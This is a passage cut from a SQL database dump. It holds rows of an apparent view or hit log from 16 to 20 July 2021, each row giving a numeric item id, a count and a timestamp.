22:55:43'),(27918,89,1,'2021-07-16','2021-07-16 23:02:42'),(27919,68,1,'2021-07-16','2021-07-16 23:28:27'),(27920,1724,1,'2021-07-17','2021-07-17 00:01:19'),(27921,3752,1,'2021-07-17','2021-07-17 00:12:30'),(27922,3746,1,'2021-07-17','2021-07-17 00:12:30'),(27923,3731,1,'2021-07-17','2021-07-17 00:12:31'),(27924,3721,1,'2021-07-17','2021-07-17 00:12:34'),(27925,3735,1,'2021-07-17','2021-07-17 00:12:34'),(27926,3735,1,'2021-07-17','2021-07-17 00:12:38'),(27927,3749,1,'2021-07-17','2021-07-17 00:12:38'),(27928,3738,1,'2021-07-17','2021-07-17 00:12:39'),(27929,3749,1,'2021-07-17','2021-07-17 00:12:40'),(27930,3727,1,'2021-07-17','2021-07-17 00:12:40'),(27931,3738,1,'2021-07-17','2021-07-17 00:12:40'),(27932,3731,1,'2021-07-17','2021-07-17 00:12:40'),(27933,3727,1,'2021-07-17','2021-07-17 00:12:41'),(27934,3724,1,'2021-07-17','2021-07-17 00:12:42'),(27935,3724,1,'2021-07-17','2021-07-17 00:14:23'),(27936,3746,1,'2021-07-17','2021-07-17 00:14:36'),(27937,3752,1,'2021-07-17','2021-07-17 00:14:44'),(27938,3721,1,'2021-07-17','2021-07-17 00:14:45'),(27939,3742,1,'2021-07-17','2021-07-17 00:14:48'),(27940,1724,1,'2021-07-17','2021-07-17 00:33:55'),(27941,2063,1,'2021-07-17','2021-07-17 01:06:38'),(27942,3735,1,'2021-07-17','2021-07-17 01:39:20'),(27943,1594,1,'2021-07-17','2021-07-17 03:24:45'),(27944,1608,1,'2021-07-17','2021-07-17 03:24:48'),(27945,335,1,'2021-07-17','2021-07-17 03:37:18'),(27946,1602,1,'2021-07-17','2021-07-17 03:49:51'),(27947,3107,1,'2021-07-17','2021-07-17 03:50:15'),(27948,3710,1,'2021-07-17','2021-07-17 04:15:12'),(27949,3438,1,'2021-07-17','2021-07-17 04:23:01'),(27950,1582,1,'2021-07-17','2021-07-17 04:29:38'),(27951,335,1,'2021-07-17','2021-07-17 04:40:05'),(27952,2178,1,'2021-07-17','2021-07-17 04:55:44'),(27953,472,1,'2021-07-17','2021-07-17 05:05:13'),(27954,3282,1,'2021-07-17','2021-07-17 05:24:42'),(27955,3731,1,'2021-07-17','2021-07-17 05:28:28'),(27956,3777,1,'2021-07-17','2021-07-17 05:30:21'),(27957,1596,1,'2021-07-17','2021-07-17 05:53:49'),(27958,3247,1,'2021-07-17','2021-07-17 06:33:55'),(27959,1604,1,'2021-07-17','2021-07-17 06:57:00'),(27960,3541,1,'2021-07-17','2021-07-17 07:06:29'),(27961,3430,1,'2021-07-17','2021-07-17 07:07:09'),(27962,1600,1,'2021-07-17','2021-07-17 07:39:22'),(27963,3704,1,'2021-07-17','2021-07-17 07:43:27'),(27964,2457,1,'2021-07-17','2021-07-17 07:54:13'),(27965,89,1,'2021-07-17','2021-07-17 08:03:11'),(27966,3282,1,'2021-07-17','2021-07-17 08:14:43'),(27967,3774,1,'2021-07-17','2021-07-17 08:22:43'),(27968,473,1,'2021-07-17','2021-07-17 08:44:47'),(27969,3034,1,'2021-07-17','2021-07-17 08:52:05'),(27970,3290,1,'2021-07-17','2021-07-17 09:01:24'),(27971,1544,1,'2021-07-17','2021-07-17 09:17:34'),(27972,474,1,'2021-07-17','2021-07-17 09:21:32'),(27973,1766,1,'2021-07-17','2021-07-17 09:30:38'),(27974,3704,1,'2021-07-17','2021-07-17 09:49:04'),(27975,3727,1,'2021-07-17','2021-07-17 09:50:18'),(27976,1602,1,'2021-07-17','2021-07-17 10:11:32'),(27977,477,1,'2021-07-17','2021-07-17 10:14:21'),(27978,1594,1,'2021-07-17','2021-07-17 10:22:47'),(27979,76,1,'2021-07-17','2021-07-17 10:39:41'),(27980,570,1,'2021-07-17','2021-07-17 11:05:24'),(27981,570,1,'2021-07-17','2021-07-17 11:05:27'),(27982,2161,1,'2021-07-17','2021-07-17 11:16:21'),(27983,2309,1,'2021-07-17','2021-07-17 11:53:19'),(27984,1544,1,'2021-07-17','2021-07-17 12:03:18'),(27985,2309,1,'2021-07-17','2021-07-17 12:24:03'),(27986,1586,1,'2021-07-17','2021-07-17 12:33:44'),(27987,2159,1,'2021-07-17','2021-07-17 13:23:42'),(27988,3534,1,'2021-07-17','2021-07-17 13:44:16'),(27989,1606,1,'2021-07-17','2021-07-17 14:04:20'),(27990,3664,1,'2021-07-17','2021-07-17 14:06:47'),(27991,84,1,'2021-07-17','2021-07-17 14:07:04'),(27992,3030,1,'2021-07-17','2021-07-17 14:14:22'),(27993,3287,1,'2021-07-17','2021-07-17 14:14:30'),(27994,3109,1,'2021-07-17','2021-07-17 14:24:34'),(27995,2159,1,'2021-07-17','2021-07-17 14:37:13'),(27996,3267,1,'2021-07-17','2021-07-17 14:55:15'),(27997,1728,1,'2021-07-17','2021-07-17 14:55:21'),(27998,68,1,'2021-07-17','2021-07-17 15:02:49'),(27999,1602,1,'2021-07-17','2021-07-17 15:16:35'),(28000,89,1,'2021-07-17','2021-07-17 15:46:30'),(28001,1604,1,'2021-07-17','2021-07-17 15:51:59'),(28002,3771,1,'2021-07-17','2021-07-17 16:46:32'),(28003,3053,1,'2021-07-17','2021-07-17 17:16:22'),(28004,2395,1,'2021-07-17','2021-07-17 17:56:27'),(28005,3181,1,'2021-07-17','2021-07-17 18:02:45'),(28006,3245,1,'2021-07-17','2021-07-17 18:06:20'),(28007,483,1,'2021-07-17','2021-07-17 18:06:24'),(28008,1602,1,'2021-07-17','2021-07-17 18:10:35'),(28009,483,1,'2021-07-17','2021-07-17 18:17:15'),(28010,3694,1,'2021-07-17','2021-07-17 18:46:42'),(28011,3257,1,'2021-07-17','2021-07-17 18:50:25'),(28012,474,1,'2021-07-17','2021-07-17 18:59:46'),(28013,1596,1,'2021-07-17','2021-07-17 19:08:25'),(28014,1596,1,'2021-07-17','2021-07-17 19:08:30'),(28015,1596,1,'2021-07-17','2021-07-17 19:09:27'),(28016,1594,1,'2021-07-17','2021-07-17 19:17:14'),(28017,1600,1,'2021-07-17','2021-07-17 19:17:40'),(28018,476,1,'2021-07-17','2021-07-17 19:29:16'),(28019,87,1,'2021-07-17','2021-07-17 19:37:22'),(28020,3181,1,'2021-07-17','2021-07-17 19:39:06'),(28021,1608,1,'2021-07-17','2021-07-17 19:42:12'),(28022,3079,1,'2021-07-17','2021-07-17 19:46:10'),(28023,3774,1,'2021-07-17','2021-07-17 19:58:30'),(28024,3777,1,'2021-07-17','2021-07-17 20:00:57'),(28025,3777,1,'2021-07-17','2021-07-17 20:07:27'),(28026,3777,1,'2021-07-17','2021-07-17 20:17:49'),(28027,3060,1,'2021-07-17','2021-07-17 20:37:09'),(28028,2457,1,'2021-07-17','2021-07-17 20:56:32'),(28029,1602,1,'2021-07-17','2021-07-17 20:56:35'),(28030,3764,1,'2021-07-17','2021-07-17 21:51:05'),(28031,2309,1,'2021-07-17','2021-07-17 22:08:13'),(28032,1588,1,'2021-07-17','2021-07-17 22:18:10'),(28033,1544,1,'2021-07-17','2021-07-17 22:28:24'),(28034,89,1,'2021-07-17','2021-07-17 22:38:31'),(28035,468,1,'2021-07-17','2021-07-17 22:45:37'),(28036,1600,1,'2021-07-17','2021-07-17 23:08:53'),(28037,1588,1,'2021-07-17','2021-07-17 23:09:23'),(28038,1606,1,'2021-07-17','2021-07-17 23:18:34'),(28039,1602,1,'2021-07-18','2021-07-18 00:34:43'),(28040,1586,1,'2021-07-18','2021-07-18 00:54:55'),(28041,84,1,'2021-07-18','2021-07-18 01:20:03'),(28042,3030,1,'2021-07-18','2021-07-18 01:30:03'),(28043,3764,1,'2021-07-18','2021-07-18 02:23:49'),(28044,1606,1,'2021-07-18','2021-07-18 03:00:09'),(28045,1606,1,'2021-07-18','2021-07-18 03:14:09'),(28046,1718,1,'2021-07-18','2021-07-18 03:19:53'),(28047,108,1,'2021-07-18','2021-07-18 03:30:02'),(28048,1718,1,'2021-07-18','2021-07-18 03:40:18'),(28049,3030,1,'2021-07-18','2021-07-18 03:50:01'),(28050,1602,1,'2021-07-18','2021-07-18 05:24:13'),(28051,91,1,'2021-07-18','2021-07-18 05:37:56'),(28052,89,1,'2021-07-18','2021-07-18 05:48:56'),(28053,2457,1,'2021-07-18','2021-07-18 05:49:43'),(28054,3034,1,'2021-07-18','2021-07-18 05:55:36'),(28055,2775,1,'2021-07-18','2021-07-18 06:07:21'),(28056,1600,1,'2021-07-18','2021-07-18 06:21:12'),(28057,1877,1,'2021-07-18','2021-07-18 06:24:59'),(28058,481,1,'2021-07-18','2021-07-18 06:36:45'),(28059,1598,1,'2021-07-18','2021-07-18 06:41:11'),(28060,481,1,'2021-07-18','2021-07-18 06:48:32'),(28061,2809,1,'2021-07-18','2021-07-18 06:51:32'),(28062,472,1,'2021-07-18','2021-07-18 07:00:17'),(28063,1598,1,'2021-07-18','2021-07-18 07:01:15'),(28064,3251,1,'2021-07-18','2021-07-18 07:12:03'),(28065,2309,1,'2021-07-18','2021-07-18 07:21:21'),(28066,91,1,'2021-07-18','2021-07-18 07:23:50'),(28067,2775,1,'2021-07-18','2021-07-18 08:01:09'),(28068,1724,1,'2021-07-18','2021-07-18 08:07:29'),(28069,2309,1,'2021-07-18','2021-07-18 08:11:18'),(28070,1588,1,'2021-07-18','2021-07-18 08:21:19'),(28071,1707,1,'2021-07-18','2021-07-18 08:31:12'),(28072,1588,1,'2021-07-18','2021-07-18 08:31:24'),(28073,3109,1,'2021-07-18','2021-07-18 08:41:59'),(28074,1877,1,'2021-07-18','2021-07-18 08:42:31'),(28075,1695,1,'2021-07-18','2021-07-18 08:58:55'),(28076,1602,1,'2021-07-18','2021-07-18 09:05:56'),(28077,1602,1,'2021-07-18','2021-07-18 09:05:57'),(28078,3290,1,'2021-07-18','2021-07-18 09:10:07'),(28079,1594,1,'2021-07-18','2021-07-18 09:13:10'),(28080,3774,1,'2021-07-18','2021-07-18 09:23:53'),(28081,2809,1,'2021-07-18','2021-07-18 09:31:34'),(28082,1608,1,'2021-07-18','2021-07-18 10:28:55'),(28083,80,1,'2021-07-18','2021-07-18 10:31:55'),(28084,1713,1,'2021-07-18','2021-07-18 10:36:04'),(28085,3430,1,'2021-07-18','2021-07-18 10:41:24'),(28086,3053,1,'2021-07-18','2021-07-18 10:51:27'),(28087,1608,1,'2021-07-18','2021-07-18 10:59:04'),(28088,1606,1,'2021-07-18','2021-07-18 11:02:10'),(28089,3109,1,'2021-07-18','2021-07-18 11:31:11'),(28090,1598,1,'2021-07-18','2021-07-18 11:34:29'),(28091,3764,1,'2021-07-18','2021-07-18 12:27:24'),(28092,1718,1,'2021-07-18','2021-07-18 12:31:46'),(28093,1606,1,'2021-07-18','2021-07-18 12:31:48'),(28094,1604,1,'2021-07-18','2021-07-18 12:59:01'),(28095,1604,1,'2021-07-18','2021-07-18 13:01:17'),(28096,3030,1,'2021-07-18','2021-07-18 13:11:44'),(28097,84,1,'2021-07-18','2021-07-18 13:42:05'),(28098,1747,1,'2021-07-18','2021-07-18 13:57:27'),(28099,3030,1,'2021-07-18','2021-07-18 14:02:10'),(28100,89,1,'2021-07-18','2021-07-18 14:08:06'),(28101,3694,1,'2021-07-18','2021-07-18 14:52:46'),(28102,1544,1,'2021-07-18','2021-07-18 15:22:54'),(28103,1600,1,'2021-07-18','2021-07-18 15:52:52'),(28104,91,1,'2021-07-18','2021-07-18 16:21:15'),(28105,3251,1,'2021-07-18','2021-07-18 16:36:21'),(28106,1877,1,'2021-07-18','2021-07-18 16:49:48'),(28107,1877,1,'2021-07-18','2021-07-18 17:04:22'),(28108,2297,1,'2021-07-18','2021-07-18 17:09:07'),(28109,3585,1,'2021-07-18','2021-07-18 17:18:25'),(28110,3290,1,'2021-07-18','2021-07-18 17:32:42'),(28111,1695,1,'2021-07-18','2021-07-18 17:38:13'),(28112,3585,1,'2021-07-18','2021-07-18 18:01:16'),(28113,3282,1,'2021-07-18','2021-07-18 18:08:13'),(28114,2309,1,'2021-07-18','2021-07-18 18:54:24'),(28115,3245,1,'2021-07-18','2021-07-18 19:14:12'),(28116,2309,1,'2021-07-18','2021-07-18 19:19:20'),(28117,1588,1,'2021-07-18','2021-07-18 19:44:54'),(28118,1608,1,'2021-07-18','2021-07-18 20:05:05'),(28119,1544,1,'2021-07-18','2021-07-18 20:19:31'),(28120,1598,1,'2021-07-18','2021-07-18 20:32:38'),(28121,467,1,'2021-07-18','2021-07-18 20:42:43'),(28122,1594,1,'2021-07-18','2021-07-18 21:01:35'),(28123,1594,1,'2021-07-18','2021-07-18 21:01:40'),(28124,1594,1,'2021-07-18','2021-07-18 21:02:04'),(28125,3060,1,'2021-07-18','2021-07-18 21:18:37'),(28126,1695,1,'2021-07-18','2021-07-18 21:35:02'),(28127,1606,1,'2021-07-18','2021-07-18 21:35:24'),(28128,1606,1,'2021-07-18','2021-07-18 21:35:25'),(28129,1582,1,'2021-07-18','2021-07-18 21:45:32'),(28130,1612,1,'2021-07-18','2021-07-18 21:45:43'),(28131,1588,1,'2021-07-18','2021-07-18 21:50:07'),(28132,89,1,'2021-07-18','2021-07-18 22:08:41'),(28133,3764,1,'2021-07-18','2021-07-18 22:14:03'),(28134,1602,1,'2021-07-18','2021-07-18 22:21:27'),(28135,76,1,'2021-07-18','2021-07-18 22:42:54'),(28136,1606,1,'2021-07-18','2021-07-18 23:02:45'),(28137,1602,1,'2021-07-18','2021-07-18 23:06:10'),(28138,76,1,'2021-07-18','2021-07-18 23:06:36'),(28139,3023,1,'2021-07-18','2021-07-18 23:07:44'),(28140,1602,1,'2021-07-18','2021-07-18 23:40:17'),(28141,1598,1,'2021-07-19','2021-07-19 00:01:21'),(28142,1594,1,'2021-07-19','2021-07-19 00:02:27'),(28143,3030,1,'2021-07-19','2021-07-19 00:31:34'),(28144,108,1,'2021-07-19','2021-07-19 00:40:56'),(28145,1600,1,'2021-07-19','2021-07-19 00:51:25'),(28146,3774,1,'2021-07-19','2021-07-19 00:56:52'),(28147,2809,1,'2021-07-19','2021-07-19 01:01:42'),(28148,3691,1,'2021-07-19','2021-07-19 02:12:24'),(28149,1600,1,'2021-07-19','2021-07-19 03:34:01'),(28150,2769,1,'2021-07-19','2021-07-19 03:53:55'),(28151,2309,1,'2021-07-19','2021-07-19 04:14:02'),(28152,472,1,'2021-07-19','2021-07-19 05:20:58'),(28153,3273,1,'2021-07-19','2021-07-19 05:25:19'),(28154,76,1,'2021-07-19','2021-07-19 05:27:53'),(28155,3486,1,'2021-07-19','2021-07-19 05:50:56'),(28156,2309,1,'2021-07-19','2021-07-19 06:03:42'),(28157,3486,1,'2021-07-19','2021-07-19 06:05:56'),(28158,1600,1,'2021-07-19','2021-07-19 06:10:00'),(28159,1870,1,'2021-07-19','2021-07-19 06:14:05'),(28160,80,1,'2021-07-19','2021-07-19 06:20:58'),(28161,3282,1,'2021-07-19','2021-07-19 06:21:00'),(28162,1588,1,'2021-07-19','2021-07-19 06:24:00'),(28163,1602,1,'2021-07-19','2021-07-19 06:49:05'),(28164,3710,1,'2021-07-19','2021-07-19 06:50:55'),(28165,3282,1,'2021-07-19','2021-07-19 06:51:35'),(28166,1602,1,'2021-07-19','2021-07-19 07:03:59'),(28167,76,1,'2021-07-19','2021-07-19 07:04:01'),(28168,1602,1,'2021-07-19','2021-07-19 07:12:03'),(28169,1606,1,'2021-07-19','2021-07-19 07:13:58'),(28170,89,1,'2021-07-19','2021-07-19 07:17:00'),(28171,1602,1,'2021-07-19','2021-07-19 07:19:29'),(28172,3109,1,'2021-07-19','2021-07-19 07:22:56'),(28173,477,1,'2021-07-19','2021-07-19 07:34:23'),(28174,1598,1,'2021-07-19','2021-07-19 07:34:25'),(28175,2991,1,'2021-07-19','2021-07-19 08:56:12'),(28176,1608,1,'2021-07-19','2021-07-19 09:54:05'),(28177,80,1,'2021-07-19','2021-07-19 10:42:25'),(28178,72,1,'2021-07-19','2021-07-19 10:42:46'),(28179,72,1,'2021-07-19','2021-07-19 10:45:11'),(28180,3030,1,'2021-07-19','2021-07-19 10:50:11'),(28181,72,1,'2021-07-19','2021-07-19 10:50:46'),(28182,3707,1,'2021-07-19','2021-07-19 10:52:14'),(28183,72,1,'2021-07-19','2021-07-19 10:52:38'),(28184,72,1,'2021-07-19','2021-07-19 10:52:47'),(28185,3707,1,'2021-07-19','2021-07-19 10:52:55'),(28186,3707,1,'2021-07-19','2021-07-19 10:53:23'),(28187,1606,1,'2021-07-19','2021-07-19 11:04:19'),(28188,1600,1,'2021-07-19','2021-07-19 11:04:56'),(28189,80,1,'2021-07-19','2021-07-19 11:05:19'),(28190,80,1,'2021-07-19','2021-07-19 11:06:04'),(28191,3585,1,'2021-07-19','2021-07-19 11:24:26'),(28192,3585,1,'2021-07-19','2021-07-19 11:24:48'),(28193,1718,1,'2021-07-19','2021-07-19 11:25:41'),(28194,3107,1,'2021-07-19','2021-07-19 11:28:41'),(28195,2769,1,'2021-07-19','2021-07-19 11:35:41'),(28196,1586,1,'2021-07-19','2021-07-19 11:46:56'),(28197,1602,1,'2021-07-19','2021-07-19 12:01:10'),(28198,68,1,'2021-07-19','2021-07-19 12:01:30'),(28199,91,1,'2021-07-19','2021-07-19 12:02:29'),(28200,68,1,'2021-07-19','2021-07-19 12:03:02'),(28201,1602,1,'2021-07-19','2021-07-19 12:03:10'),(28202,1602,1,'2021-07-19','2021-07-19 12:05:19'),(28203,76,1,'2021-07-19','2021-07-19 12:05:31'),(28204,72,1,'2021-07-19','2021-07-19 12:06:08'),(28205,1588,1,'2021-07-19','2021-07-19 12:06:17'),(28206,2159,1,'2021-07-19','2021-07-19 12:23:43'),(28207,3691,1,'2021-07-19','2021-07-19 12:26:11'),(28208,3034,1,'2021-07-19','2021-07-19 12:29:02'),(28209,570,1,'2021-07-19','2021-07-19 12:33:06'),(28210,1728,1,'2021-07-19','2021-07-19 12:53:43'),(28211,1602,1,'2021-07-19','2021-07-19 12:57:43'),(28212,1594,1,'2021-07-19','2021-07-19 12:59:00'),(28213,1602,1,'2021-07-19','2021-07-19 13:01:28'),(28214,1612,1,'2021-07-19','2021-07-19 13:29:03'),(28215,1614,1,'2021-07-19','2021-07-19 13:29:15'),(28216,76,1,'2021-07-19','2021-07-19 13:29:45'),(28217,1614,1,'2021-07-19','2021-07-19 13:30:05'),(28218,76,1,'2021-07-19','2021-07-19 13:30:11'),(28219,76,1,'2021-07-19','2021-07-19 13:30:27'),(28220,3023,1,'2021-07-19','2021-07-19 13:59:01'),(28221,1594,1,'2021-07-19','2021-07-19 14:39:53'),(28222,2309,1,'2021-07-19','2021-07-19 15:09:42'),(28223,1600,1,'2021-07-19','2021-07-19 15:19:04'),(28224,2159,1,'2021-07-19','2021-07-19 15:28:09'),(28225,2769,1,'2021-07-19','2021-07-19 15:59:01'),(28226,2309,1,'2021-07-19','2021-07-19 16:09:03'),(28227,2159,1,'2021-07-19','2021-07-19 16:21:17'),(28228,3777,1,'2021-07-19','2021-07-19 16:34:04'),(28229,1726,1,'2021-07-19','2021-07-19 16:36:11'),(28230,1596,1,'2021-07-19','2021-07-19 16:42:11'),(28231,1598,1,'2021-07-19','2021-07-19 16:46:08'),(28232,2457,1,'2021-07-19','2021-07-19 16:48:21'),(28233,1726,1,'2021-07-19','2021-07-19 16:51:11'),(28234,1588,1,'2021-07-19','2021-07-19 16:55:47'),(28235,3664,1,'2021-07-19','2021-07-19 17:06:09'),(28236,477,1,'2021-07-19','2021-07-19 17:19:00'),(28237,3083,1,'2021-07-19','2021-07-19 17:19:22'),(28238,76,1,'2021-07-19','2021-07-19 17:21:03'),(28239,3664,1,'2021-07-19','2021-07-19 17:21:09'),(28240,3060,1,'2021-07-19','2021-07-19 17:38:26'),(28241,1606,1,'2021-07-19','2021-07-19 18:08:42'),(28242,474,1,'2021-07-19','2021-07-19 18:17:06'),(28243,2150,1,'2021-07-19','2021-07-19 18:21:11'),(28244,1610,1,'2021-07-19','2021-07-19 18:27:20'),(28245,1606,1,'2021-07-19','2021-07-19 18:28:51'),(28246,468,1,'2021-07-19','2021-07-19 18:36:45'),(28247,1602,1,'2021-07-19','2021-07-19 18:55:55'),(28248,1598,1,'2021-07-19','2021-07-19 19:00:59'),(28249,477,1,'2021-07-19','2021-07-19 19:15:17'),(28250,2159,1,'2021-07-19','2021-07-19 19:22:13'),(28251,3030,1,'2021-07-19','2021-07-19 19:45:46'),(28252,1600,1,'2021-07-19','2021-07-19 20:20:57'),(28253,474,1,'2021-07-19','2021-07-19 21:55:06'),(28254,2457,1,'2021-07-19','2021-07-19 22:23:21'),(28255,1718,1,'2021-07-19','2021-07-19 22:23:45'),(28256,467,1,'2021-07-19','2021-07-19 22:33:00'),(28257,1600,1,'2021-07-19','2021-07-19 22:47:42'),(28258,89,1,'2021-07-19','2021-07-19 22:59:32'),(28259,1588,1,'2021-07-19','2021-07-19 23:03:07'),(28260,1582,1,'2021-07-19','2021-07-19 23:06:14'),(28261,2769,1,'2021-07-19','2021-07-19 23:13:45'),(28262,3034,1,'2021-07-19','2021-07-19 23:34:46'),(28263,1602,1,'2021-07-20','2021-07-20 00:03:20'),(28264,1596,1,'2021-07-20','2021-07-20 00:15:31'),(28265,1600,1,'2021-07-20','2021-07-20 00:23:46'),(28266,1594,1,'2021-07-20','2021-07-20 00:31:54'),(28267,2309,1,'2021-07-20','2021-07-20 00:43:45'),(28268,1588,1,'2021-07-20','2021-07-20 00:53:57'),(28269,3023,1,'2021-07-20','2021-07-20 01:26:28'),(28270,2309,1,'2021-07-20','2021-07-20 01:44:19'),(28271,472,1,'2021-07-20','2021-07-20 02:20:59'),(28272,1608,1,'2021-07-20','2021-07-20 02:36:07'),(28273,3777,1,'2021-07-20','2021-07-20 03:15:33'),(28274,2769,1,'2021-07-20','2021-07-20 03:49:17'),(28275,2457,1,'2021-07-20','2021-07-20 04:10:04'),(28276,1598,1,'2021-07-20','2021-07-20 04:19:26'),(28277,1741,1,'2021-07-20','2021-07-20 04:26:50'),(28278,1600,1,'2021-07-20','2021-07-20 05:59:28'),(28279,3691,1,'2021-07-20','2021-07-20 06:09:26'),(28280,1718,1,'2021-07-20','2021-07-20 06:49:54'),(28281,477,1,'2021-07-20','2021-07-20 07:07:51'),(28282,2704,1,'2021-07-20','2021-07-20 07:11:40'),(28283,1582,1,'2021-07-20','2021-07-20 07:15:24'),(28284,477,1,'2021-07-20','2021-07-20 07:23:23'),(28285,1596,1,'2021-07-20','2021-07-20 07:30:04'),(28286,2775,1,'2021-07-20','2021-07-20 07:30:21'),(28287,1588,1,'2021-07-20','2021-07-20 07:50:04'),(28288,1877,1,'2021-07-20','2021-07-20 07:52:52'),(28289,2775,1,'2021-07-20','2021-07-20 08:00:21'),(28290,1612,1,'2021-07-20','2021-07-20 08:08:22'),(28291,3710,1,'2021-07-20','2021-07-20 08:15:21'),(28292,1598,1,'2021-07-20','2021-07-20 08:20:14'),(28293,3030,1,'2021-07-20','2021-07-20 08:22:35'),(28294,3251,1,'2021-07-20','2021-07-20 08:22:52'),(28295,2775,1,'2021-07-20','2021-07-20 08:30:20'),(28296,3030,1,'2021-07-20','2021-07-20 08:32:32'),(28297,2769,1,'2021-07-20','2021-07-20 08:32:36'),(28298,1594,1,'2021-07-20','2021-07-20 09:08:36'),(28299,1594,1,'2021-07-20','2021-07-20 09:14:09'),(28300,3290,1,'2021-07-20','2021-07-20 09:15:21'),(28301,1602,1,'2021-07-20','2021-07-20 09:19:12'),(28302,3034,1,'2021-07-20','2021-07-20 09:30:21'),(28303,474,1,'2021-07-20','2021-07-20 09:37:50'),(28304,1600,1,'2021-07-20','2021-07-20 09:40:38'),(28305,2809,1,'2021-07-20','2021-07-20 09:42:15'),(28306,3034,1,'2021-07-20','2021-07-20 09:45:45'),(28307,2309,1,'2021-07-20','2021-07-20 09:52:15'),(28308,3253,1,'2021-07-20','2021-07-20 09:52:20'),(28309,3710,1,'2021-07-20','2021-07-20 09:52:52'),(28310,468,1,'2021-07-20','2021-07-20 10:07:51'),(28311,80,1,'2021-07-20','2021-07-20 10:19:34'),(28312,3707,1,'2021-07-20','2021-07-20 10:19:42'),(28313,3175,1,'2021-07-20','2021-07-20 10:20:23'),(28314,3178,1,'2021-07-20','2021-07-20 10:20:33'),(28315,3180,1,'2021-07-20','2021-07-20 10:20:41'),(28316,3181,1,'2021-07-20','2021-07-20 10:20:47'),(28317,3585,1,'2021-07-20','2021-07-20 10:21:05'),(28318,3585,1,'2021-07-20','2021-07-20 10:21:12'),(28319,3673,1,'2021-07-20','2021-07-20 10:21:31'),(28320,1612,1,'2021-07-20','2021-07-20 10:31:52'),(28321,3674,1,'2021-07-20','2021-07-20 10:55:08'),(28322,1602,1,'2021-07-20','2021-07-20 10:55:52'),(28323,3673,1,'2021-07-20','2021-07-20 10:57:51'),(28324,3673,1,'2021-07-20','2021-07-20 10:58:14'),(28325,3673,1,'2021-07-20','2021-07-20 10:58:26'),(28326,3674,1,'2021-07-20','2021-07-20 10:58:45'),(28327,3674,1,'2021-07-20','2021-07-20 10:58:56'),(28328,3058,1,'2021-07-20','2021-07-20 10:59:05'),(28329,3674,1,'2021-07-20','2021-07-20 10:59:19'),(28330,3673,1,'2021-07-20','2021-07-20 10:59:24'),(28331,3674,1,'2021-07-20','2021-07-20 10:59:37'),(28332,3673,1,'2021-07-20','2021-07-20 11:03:09'),(28333,1582,1,'2021-07-20','2021-07-20 11:07:50'),(28334,3175,1,'2021-07-20','2021-07-20 11:09:53'),(28335,3675,1,'2021-07-20','2021-07-20 11:13:19'),(28336,3675,1,'2021-07-20','2021-07-20 11:14:31'),(28337,1720,1,'2021-07-20','2021-07-20 11:26:33'),(28338,80,1,'2021-07-20','2021-07-20 11:31:56'),(28339,1596,1,'2021-07-20','2021-07-20 11:32:26'),(28340,3774,1,'2021-07-20','2021-07-20 11:43:52'),(28341,3290,1,'2021-07-20','2021-07-20 11:56:26'),(28342,1602,1,'2021-07-20','2021-07-20 11:57:15'),(28343,1602,1,'2021-07-20','2021-07-20 11:58:13'),(28344,1602,1,'2021-07-20','2021-07-20 12:02:21'),(28345,3251,1,'2021-07-20','2021-07-20 12:07:50'),(28346,2609,1,'2021-07-20','2021-07-20 12:11:51'),(28347,1718,1,'2021-07-20','2021-07-20 12:12:46'),(28348,2609,1,'2021-07-20','2021-07-20 12:16:55'),(28349,3774,1,'2021-07-20','2021-07-20 12:19:51'),(28350,474,1,'2021-07-20','2021-07-20 12:31:53'),(28351,3680,1,'2021-07-20','2021-07-20 12:45:38'),(28352,3680,1,'2021-07-20','2021-07-20 12:45:48'),(28353,68,1,'2021-07-20','2021-07-20 12:47:51'),(28354,72,1,'2021-07-20','2021-07-20 12:49:28'),(28355,3707,1,'2021-07-20','2021-07-20 12:50:09'),(28356,72,1,'2021-07-20','2021-07-20 12:51:19'),(28357,1598,1,'2021-07-20','2021-07-20 12:53:06'),(28358,3707,1,'2021-07-20','2021-07-20 12:53:29'),(28359,3707,1,'2021-07-20','2021-07-20 12:54:24'),(28360,3056,1,'2021-07-20','2021-07-20 12:54:45'),(28361,1606,1,'2021-07-20','2021-07-20 13:03:05'),(28362,1602,1,'2021-07-20','2021-07-20 13:11:26'),(28363,1728,1,'2021-07-20','2021-07-20 13:12:52'),(28364,1612,1,'2021-07-20','2021-07-20 13:20:42'),(28365,2904,1,'2021-07-20','2021-07-20 13:21:23'),(28366,1602,1,'2021-07-20','2021-07-20 13:23:22'),(28367,2769,1,'2021-07-20','2021-07-20 13:23:27'),(28368,1734,1,'2021-07-20','2021-07-20 13:23:30'),(28369,91,1,'2021-07-20','2021-07-20 13:23:59'),(28370,3023,1,'2021-07-20','2021-07-20 13:31:52'),(28371,1602,1,'2021-07-20','2021-07-20 13:36:35'),(28372,3245,1,'2021-07-20','2021-07-20 14:43:37'),(28373,89,1,'2021-07-20','2021-07-20 14:49:31'),(28374,472,1,'2021-07-20','2021-07-20 14:59:43'),(28375,3774,1,'2021-07-20','2021-07-20 15:27:55'),(28376,3316,1,'2021-07-20','2021-07-20 15:43:36'),(28377,3030,1,'2021-07-20','2021-07-20 15:56:23'),(28378,1612,1,'2021-07-20','2021-07-20 16:31:51'),(28379,1870,1,'2021-07-20','2021-07-20 16:43:49'),(28380,3030,1,'2021-07-20','2021-07-20 16:57:50'),(28381,472,1,'2021-07-20','2021-07-20 17:32:09'),(28382,3691,1,'2021-07-20','2021-07-20 17:49:05'),(28383,3243,1,'2021-07-20','2021-07-20 17:51:08'),(28384,3030,1,'2021-07-20','2021-07-20 18:15:27'),(28385,2704,1,'2021-07-20','2021-07-20 18:31:55'),(28386,1596,1,'2021-07-20','2021-07-20 18:35:26'),(28387,1544,1,'2021-07-20','2021-07-20 18:55:22'),(28388,80,1,'2021-07-20','2021-07-20 19:29:51'),(28389,3673,1,'2021-07-20','2021-07-20 19:30:01'),(28390,1594,1,'2021-07-20','2021-07-20 19:30:32'),(28391,1582,1,'2021-07-20','2021-07-20 19:31:57'),(28392,2904,1,'2021-07-20','2021-07-20 19:54:25'),(28393,3764,1,'2021-07-20','2021-07-20 20:00:12'),(28394,1596,1,'2021-07-20','2021-07-20 20:06:23'),(28395,335,1,'2021-07-20','2021-07-20 20:07:08'),(28396,1586,1,'2021-07-20','2021-07-20 20:31:52'),(28397,1588,1,'2021-07-20','2021-07-20 20:41:21'),(28398,1600,1,'2021-07-20','2021-07-20 21:22:12'),(28399,3781,1,'2021-07-20','2021-07-20 21:28:50'),(28400,1606,1,'2021-07-20','2021-07-20 21:52:24'),(28401,3781,1,'2021-07-20','2021-07-20 22:00:50'),(28402,3781,1,'2021-07-20','2021-07-20 22:00:53'),(28403,474,1,'2021-07-20','2021-07-20 